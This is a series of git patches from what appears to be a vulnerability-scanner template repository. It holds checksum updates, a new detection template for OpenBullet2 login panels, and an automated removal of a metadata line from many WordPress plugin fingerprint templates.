http/exposed-panels/asus-aicloud-panel.yaml:eefcc5ae36061f8693e6ac587612690a796a2c29
http/exposed-panels/asus-router-panel.yaml:8ea7bcedfe52d29e4f0bba873c39fd3bd21920de
http/exposed-panels/atlantis-detect.yaml:75f75e5d34df32dec3b57cfd441f6288123e8fc6
-http/exposed-panels/atlassian-crowd-panel.yaml:fa952a2cded7ae361d963e0d0f901122877f4f73
+http/exposed-panels/atlassian-crowd-panel.yaml:97ea8834eea624d69f18f42dc58febd9ed6ec7cf
http/exposed-panels/atvise-login.yaml:3b4b9504f959a5ca4dbc871b4ab5934d93b72a00
http/exposed-panels/audiocodes-detect.yaml:53e96cf4dc36fba06baedfa924888a49f54b4afc
http/exposed-panels/avantfax-panel.yaml:1a895c83b14699c7f7da33f606ae55b81044db9e
@@ -2716,7 +2716,7 @@ http/exposed-panels/gogs-panel.yaml:a7d00efdb994a22be1b5c901624191abc093dae2
http/exposed-panels/gophish-login.yaml:5a6d89fec057a0603f0cbbcec9b2924bd641f6c0
http/exposed-panels/gradle/gradle-cache-node-detect.yaml:4f0449b3edcae32b63e5f5f04c3343ed53d912a2
http/exposed-panels/gradle/gradle-enterprise-panel.yaml:04dd111469ebeb05ca36e0b7a8d9696282bbf9c7
-http/exposed-panels/grafana-detect.yaml:e98769ecc3c312d9035242d30c814a333147e9bf
+http/exposed-panels/grafana-detect.yaml:c065eb2cdedb01b5ceb4ff875fbd8e9dd80e143d
http/exposed-panels/grails-database-admin-console.yaml:fbe4781e9211b2132c52cbf8c7a37ad5e8b6ccf9
http/exposed-panels/graphite-browser.yaml:7ffb067e1ab2cb7e670f221db838615ebff01a60
http/exposed-panels/group-ib-panel.yaml:803f784b144a69fafa114c4dcbda201ef6ce824b
@@ -2797,7 +2797,6 @@ http/exposed-panels/jeedom-panel.yaml:1d37029c4956f126233ecf43aa1211142fb20d8c
http/exposed-panels/jenkins-api-panel.yaml:889cfedcc5df58ec420c12993a17c337cf55f702
http/exposed-panels/jenkins-login.yaml:5ada007081b1f6daf34ca4af7e334334ba406fb6
http/exposed-panels/jfrog-login.yaml:b591e393fb9183a2b85e0038cf3428d76a1f7b4a
-http/exposed-panels/jira-detect.yaml:51b388ad60d0188102cb65186aed38d781a25283
http/exposed-panels/joget/joget-panel.yaml:c3c164fde8de3d0438c3f270c3099a64a9c85274
http/exposed-panels/joomla-panel.yaml:bf2b87bf46853ac01946895c77d1213e3ff19f45
http/exposed-panels/jumpserver-panel.yaml:fd562432a15ec6de0ae4054f413ad64f56398a7b
@@ -4975,7 +4974,7 @@ http/technologies/apache/default-apache2-page.yaml:2586786635609fcb0fe1faec11dd1
http/technologies/apache/default-apache2-ubuntu-page.yaml:cbcdd8c0da4707a40001141bf2cd0d5f37ff22a7
http/technologies/apache/kafka-manager-panel.yaml:9b2e8695e7c5d9cb938bbc6b4b64ad595fc6acb0
http/technologies/apache/ranger-detection.yaml:c225b0748cab7b8d0efa68e05630ab6e2a4ea676
-http/technologies/apache/tomcat-detect.yaml:6dda1c9c0fb71796de314995b727a8dd10fa7401
+http/technologies/apache/tomcat-detect.yaml:7e32549c275c0fe8ae9857512ec1b49b12921650
http/technologies/apache/xampp-default-page.yaml:26e4f4c861533b63aa7772a99a1fe7e8ddb7a0cb
http/technologies/apollo-server-detect.yaml:4d49ba226ce861d3e1cbb98a7287de15cfe90b16
http/technologies/appcms-detect.yaml:32a10eaadb5c9609e086d55f51ec70db04e27876
@@ -5107,8 +5106,9 @@ http/technologies/ispyconnect-detect.yaml:53eb66fe2e94e79f9f654a40813930dd04ad22
http/technologies/jboss-detect.yaml:df6032d62564299ca78e06a8931964618f0c6d39
http/technologies/jeecg-boot-detect.yaml:c2d789b213b0f71ab75759a50d80de95c5c7a765
http/technologies/jellyfin-detect.yaml:df4fb9e94effb52440cec30f6d742af1ae4d6524
-http/technologies/jenkins-detect.yaml:8daef22a72f50487ff59b90820afb2808a5119cc
+http/technologies/jenkins-detect.yaml:7a0967d2a3d97321ab9620ad20ae7b3cb98fbcda
http/technologies/jhipster-detect.yaml:b42fd6c84d56fbe83bf1ddc6ab57c2e188169ed4
+http/technologies/jira-detect.yaml:63e7961c4c5380514ef93e4e64f1f6eacc22fac0
http/technologies/jira-serverinfo.yaml:ffd9c99f55855bc1277acf84da660a41fcc21dca
http/technologies/jitsi-meet-detect.yaml:1249770b5b3c81d99881b23844d06ddc10704157
http/technologies/jolokia-detect.yaml:2011275e69c3555dc1d053fe61c0770449d847af
@@ -5501,7 +5501,7 @@ http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c4
http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39
http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259
http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a
-http/technologies/wordpress-detect.yaml:fcd6c47e6ae72e3d87671b6cd0b892a0879adfec
+http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9
http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed
http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69
http/technologies/wuzhicms-detect.yaml:a2089ab6511154739a5b84c3bf5dae344faac492
@@ -6445,7 +6445,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e
ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec
-templates-checksum.txt:04685e36d83ed6325fbe9345e2ff36f7fdb6c119
+templates-checksum.txt:6f3b58ebac015277191ce884d70e98c777bfd0dc
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f
@@ -6522,7 +6522,7 @@ workflows/jeedom-workflow.yaml:8b05a4b0873e2d310f108b379192e23e6364cbae
workflows/jellyfin-workflow.yaml:217c8c9d83caa1cda5ee6dc5a6532344ea07551d
workflows/jenkins-workflow.yaml:c3361d8c83d0de7bf8063cc0ede3f6560aca58d3
workflows/jetty-workflow.yaml:910c838c22989532ce9450b7eac14452e4fcd857
-workflows/jira-workflow.yaml:cad07f068bb3fca74cd0c26acb56683a5f0eba52
+workflows/jira-workflow.yaml:df8099d5d7feadeccf6b5240414a4a8096a188f0
workflows/joomla-workflow.yaml:15c3f53c5e10801be8877c97c8bda7262d6364c2
workflows/kentico-workflow.yaml:5ff7d49cc90a581eeff2b7aacf9346fd8b98fc0f
workflows/keycloak-workflow.yaml:e7a4fb15cbd51107269c993cd95479bbeae40595
From 0ec0935bdaefc97b50ad0eb972079715317af009 Mon Sep 17 00:00:00 2001
From: mastercho
Date: Sun, 25 Jun 2023 02:35:08 +0300
Subject: [PATCH 540/670] Added Openbullet2 Panel Detect
---
http/exposed-panels/openbullet2-panel.yaml | 30 ++++++++++++++++++++++
1 file changed, 30 insertions(+)
create mode 100644 http/exposed-panels/openbullet2-panel.yaml
diff --git a/http/exposed-panels/openbullet2-panel.yaml b/http/exposed-panels/openbullet2-panel.yaml
new file mode 100644
index 0000000000..988eb9d991
--- /dev/null
+++ b/http/exposed-panels/openbullet2-panel.yaml
@@ -0,0 +1,30 @@
+id: openbullet2-detect
+
+info:
+ name: Openbullet - Detect
+ author: MaStErChO
+ severity: info
+ description: Openbullet was detected.
+
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+ cvss-score: 0.0
+ tags: openbullet,panel,login
+ metadata:
+ max-request: 1
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "OpenBullet2"
+
+ - type: status
+ status:
+ - 200
+
From ab891a38595894be32f03923a9ffa093f529b4d8 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Sun, 25 Jun 2023 04:02:17 +0000
Subject: [PATCH 541/670] Auto WordPress Plugins Update [Sun Jun 25 04:02:17
UTC 2023] :robot:
---
http/technologies/wordpress/plugins/ad-inserter.yaml | 1 -
http/technologies/wordpress/plugins/add-to-any.yaml | 1 -
http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 -
http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 -
http/technologies/wordpress/plugins/akismet.yaml | 1 -
.../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 -
http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 -
http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 -
.../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 -
http/technologies/wordpress/plugins/amp.yaml | 1 -
http/technologies/wordpress/plugins/antispam-bee.yaml | 1 -
http/technologies/wordpress/plugins/astra-sites.yaml | 1 -
http/technologies/wordpress/plugins/astra-widgets.yaml | 1 -
http/technologies/wordpress/plugins/autoptimize.yaml | 1 -
http/technologies/wordpress/plugins/backwpup.yaml | 1 -
http/technologies/wordpress/plugins/better-search-replace.yaml | 1 -
http/technologies/wordpress/plugins/better-wp-security.yaml | 1 -
.../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 -
http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 -
http/technologies/wordpress/plugins/breeze.yaml | 1 -
http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 -
.../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 -
http/technologies/wordpress/plugins/classic-editor.yaml | 1 -
http/technologies/wordpress/plugins/classic-widgets.yaml | 1 -
.../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 -
http/technologies/wordpress/plugins/cloudflare.yaml | 1 -
http/technologies/wordpress/plugins/cmb2.yaml | 1 -
http/technologies/wordpress/plugins/coblocks.yaml | 1 -
http/technologies/wordpress/plugins/code-snippets.yaml | 1 -
http/technologies/wordpress/plugins/coming-soon.yaml | 1 -
http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 -
http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 -
http/technologies/wordpress/plugins/contact-form-7.yaml | 1 -
http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 -
http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 -
http/technologies/wordpress/plugins/cookie-notice.yaml | 1 -
http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 -
.../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 -
http/technologies/wordpress/plugins/custom-css-js.yaml | 1 -
http/technologies/wordpress/plugins/custom-fonts.yaml | 1 -
http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 -
http/technologies/wordpress/plugins/disable-comments.yaml | 1 -
http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 -
http/technologies/wordpress/plugins/duplicate-page.yaml | 1 -
http/technologies/wordpress/plugins/duplicate-post.yaml | 1 -
http/technologies/wordpress/plugins/duplicator.yaml | 1 -
.../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 -
http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 -
http/technologies/wordpress/plugins/easy-google-fonts.yaml | 1 -
http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 -
http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 -
http/technologies/wordpress/plugins/elementor.yaml | 1 -
http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 -
http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 -
http/technologies/wordpress/plugins/envato-elements.yaml | 1 -
.../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 -
http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 -
.../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 -
http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 -
.../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 -
http/technologies/wordpress/plugins/flamingo.yaml | 1 -
http/technologies/wordpress/plugins/fluentform.yaml | 1 -
http/technologies/wordpress/plugins/font-awesome.yaml | 1 -
.../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 -
http/technologies/wordpress/plugins/formidable.yaml | 1 -
http/technologies/wordpress/plugins/forminator.yaml | 1 -
http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 -
http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 -
.../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 -
.../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 -
http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 -
http/technologies/wordpress/plugins/google-site-kit.yaml | 1 -
.../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 -
http/technologies/wordpress/plugins/gtranslate.yaml | 1 -
http/technologies/wordpress/plugins/gutenberg.yaml | 1 -
http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 -
.../wordpress/plugins/header-and-footer-scripts.yaml | 1 -
.../wordpress/plugins/header-footer-code-manager.yaml | 1 -
http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 -
http/technologies/wordpress/plugins/header-footer.yaml | 1 -
http/technologies/wordpress/plugins/health-check.yaml | 1 -
http/technologies/wordpress/plugins/hello-dolly.yaml | 1 -
http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 -
http/technologies/wordpress/plugins/imagify.yaml | 1 -
http/technologies/wordpress/plugins/imsanity.yaml | 1 -
.../wordpress/plugins/insert-headers-and-footers.yaml | 1 -
http/technologies/wordpress/plugins/instagram-feed.yaml | 1 -
.../wordpress/plugins/intuitive-custom-post-order.yaml | 1 -
http/technologies/wordpress/plugins/iwp-client.yaml | 1 -
http/technologies/wordpress/plugins/jetpack.yaml | 1 -
http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 -
http/technologies/wordpress/plugins/kirki.yaml | 1 -
http/technologies/wordpress/plugins/leadin.yaml | 1 -
.../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 -
http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 -
http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 -
http/technologies/wordpress/plugins/loco-translate.yaml | 1 -
http/technologies/wordpress/plugins/loginizer.yaml | 1 -
http/technologies/wordpress/plugins/loginpress.yaml | 1 -
.../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 -
http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 -
http/technologies/wordpress/plugins/mailpoet.yaml | 1 -
http/technologies/wordpress/plugins/maintenance.yaml | 1 -
http/technologies/wordpress/plugins/mainwp-child.yaml | 1 -
http/technologies/wordpress/plugins/malcare-security.yaml | 1 -
http/technologies/wordpress/plugins/megamenu.yaml | 1 -
http/technologies/wordpress/plugins/members.yaml | 1 -
http/technologies/wordpress/plugins/meta-box.yaml | 1 -
http/technologies/wordpress/plugins/ml-slider.yaml | 1 -
http/technologies/wordpress/plugins/newsletter.yaml | 1 -
.../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 -
http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 -
http/technologies/wordpress/plugins/ninja-forms.yaml | 1 -
http/technologies/wordpress/plugins/ocean-extra.yaml | 1 -
http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 -
http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 -
http/technologies/wordpress/plugins/optinmonster.yaml | 1 -
http/technologies/wordpress/plugins/otter-blocks.yaml | 1 -
http/technologies/wordpress/plugins/password-protected.yaml | 1 -
http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 -
http/technologies/wordpress/plugins/photo-gallery.yaml | 1 -
http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 -
http/technologies/wordpress/plugins/polylang.yaml | 1 -
http/technologies/wordpress/plugins/popup-builder.yaml | 1 -
http/technologies/wordpress/plugins/popup-maker.yaml | 1 -
http/technologies/wordpress/plugins/post-smtp.yaml | 1 -
http/technologies/wordpress/plugins/post-types-order.yaml | 1 -
.../wordpress/plugins/premium-addons-for-elementor.yaml | 1 -
http/technologies/wordpress/plugins/pretty-link.yaml | 1 -
http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 -
http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 -
http/technologies/wordpress/plugins/redirection.yaml | 1 -
http/technologies/wordpress/plugins/redux-framework.yaml | 1 -
http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 -
http/technologies/wordpress/plugins/safe-svg.yaml | 1 -
http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 -
http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 -
http/technologies/wordpress/plugins/sg-security.yaml | 1 -
http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 -
.../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 -
.../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 -
http/technologies/wordpress/plugins/siteguard.yaml | 1 -
http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 -
http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 -
http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 -
.../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 -
http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 -
http/technologies/wordpress/plugins/svg-support.yaml | 1 -
http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 -
http/technologies/wordpress/plugins/tablepress.yaml | 1 -
http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 -
http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 -
http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 -
http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 -
.../wordpress/plugins/translatepress-multilingual.yaml | 1 -
.../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 -
http/technologies/wordpress/plugins/under-construction-page.yaml | 1 -
http/technologies/wordpress/plugins/updraftplus.yaml | 1 -
http/technologies/wordpress/plugins/use-any-font.yaml | 1 -
http/technologies/wordpress/plugins/user-role-editor.yaml | 1 -
.../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 -
http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 -
.../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 -
http/technologies/wordpress/plugins/webp-express.yaml | 1 -
.../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 -
.../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 -
.../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 -
http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 -
.../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 -
.../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 -
http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 -
.../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 -
.../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 -
http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 -
http/technologies/wordpress/plugins/woocommerce.yaml | 1 -
http/technologies/wordpress/plugins/wordfence.yaml | 1 -
http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 -
http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 -
http/technologies/wordpress/plugins/worker.yaml | 1 -
http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 -
http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 -
http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 -
http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 -
http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 -
http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 -
http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 -
http/technologies/wordpress/plugins/wp-optimize.yaml | 1 -
http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 -
http/technologies/wordpress/plugins/wp-reset.yaml | 1 -
http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 -
http/technologies/wordpress/plugins/wp-smushit.yaml | 1 -
http/technologies/wordpress/plugins/wp-statistics.yaml | 1 -
http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 -
http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 -
http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 -
http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 -
http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 -
http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 -
http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 -
.../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 -
200 files changed, 200 deletions(-)
diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index ebb5ba1042..7cbd1855ae 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/ad-inserter/
metadata:
- max-request: 1
plugin_namespace: ad-inserter
wpscan: https://wpscan.com/plugin/ad-inserter
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index fddfbf3118..8d579ff23d 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/add-to-any/
metadata:
- max-request: 1
plugin_namespace: add-to-any
wpscan: https://wpscan.com/plugin/add-to-any
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 7a6e8a76ec..4a6d8b7bbe 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/admin-menu-editor/
metadata:
- max-request: 1
plugin_namespace: admin-menu-editor
wpscan: https://wpscan.com/plugin/admin-menu-editor
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index 940c0e614c..e4eb308d39 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/advanced-custom-fields/
metadata:
- max-request: 1
plugin_namespace: advanced-custom-fields
wpscan: https://wpscan.com/plugin/advanced-custom-fields
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index 06cfd4950b..97f1d8c18f 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/akismet/
metadata:
- max-request: 1
plugin_namespace: akismet
wpscan: https://wpscan.com/plugin/akismet
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 90aa5881fd..10f104f2c7 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/all-404-redirect-to-homepage/
metadata:
- max-request: 1
plugin_namespace: all-404-redirect-to-homepage
wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 1bf337da6c..8addc28ded 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/all-in-one-seo-pack/
metadata:
- max-request: 1
plugin_namespace: all-in-one-seo-pack
wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 7cec152555..2e579621ac 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/all-in-one-wp-migration/
metadata:
- max-request: 1
plugin_namespace: all-in-one-wp-migration
wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 8a4b6133cd..41e297ffeb 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
metadata:
- max-request: 1
plugin_namespace: all-in-one-wp-security-and-firewall
wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index cfa2e3d080..0dd8686ec3 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/amp/
metadata:
- max-request: 1
plugin_namespace: amp
wpscan: https://wpscan.com/plugin/amp
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index a92d9bde4e..359671f3bd 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/antispam-bee/
metadata:
- max-request: 1
plugin_namespace: antispam-bee
wpscan: https://wpscan.com/plugin/antispam-bee
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 59144c7dd5..116e0c420a 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/astra-sites/
metadata:
- max-request: 1
plugin_namespace: astra-sites
wpscan: https://wpscan.com/plugin/astra-sites
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index df06ba2f35..dc4703ef8d 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/astra-widgets/
metadata:
- max-request: 1
plugin_namespace: astra-widgets
wpscan: https://wpscan.com/plugin/astra-widgets
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 2a79d529cc..1426ac3ef2 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/autoptimize/
metadata:
- max-request: 1
plugin_namespace: autoptimize
wpscan: https://wpscan.com/plugin/autoptimize
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 556a113acc..78d1651ff4 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/backwpup/
metadata:
- max-request: 1
plugin_namespace: backwpup
wpscan: https://wpscan.com/plugin/backwpup
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index 58d9a9d738..f7219b373d 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/better-search-replace/
metadata:
- max-request: 1
plugin_namespace: better-search-replace
wpscan: https://wpscan.com/plugin/better-search-replace
